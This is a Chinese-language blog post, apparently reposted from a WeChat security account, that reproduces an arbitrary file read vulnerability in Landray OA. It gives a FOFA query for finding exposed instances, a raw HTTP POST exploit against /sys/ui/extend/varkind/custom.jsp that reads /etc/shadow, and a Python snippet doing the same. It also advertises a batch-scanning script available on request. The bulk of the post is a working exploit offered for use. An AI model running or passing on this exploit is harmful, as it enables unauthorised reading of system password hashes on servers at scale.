漏洞复现-蓝凌OA文件读取

  • A+
所属分类:安全文章

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


FOFA语句:

app="Landray-OA"


漏洞相关介绍:

深圳市蓝凌软件股份有限公司成立于2001年,生态OA引领者、数字化工作专业服务商、阿里云知识管理与协同领域首家战略合作伙伴,为各类组织提供智能办公、移动门户、知识管理、合同管理、数字运营、财务共享等一体化解决方案,近期Landray-OA系统被爆出存任意文件读取漏洞。


漏洞POC分析:


POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
var={"body":{"file":"file:///etc/shadow"}}


漏洞利用截图:

漏洞复现-蓝凌OA文件读取


脚本部分代码:

target = url+"/sys/ui/extend/varkind/custom.jsp"    headers = {      'Content-Type': 'application/x-www-form-urlencoded',      'Accept-Encoding': 'gzip',    }    data = 'var={"body":{"file":"file:///etc/shadow"}}'


脚本利用截图:

漏洞复现-蓝凌OA文件读取

漏洞复现-蓝凌OA文件读取

支持批量扫描,单个扫描!

获取脚本回复:蓝凌OA

本文始发于微信公众号(Fight Tigers Team):漏洞复现-蓝凌OA文件读取

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: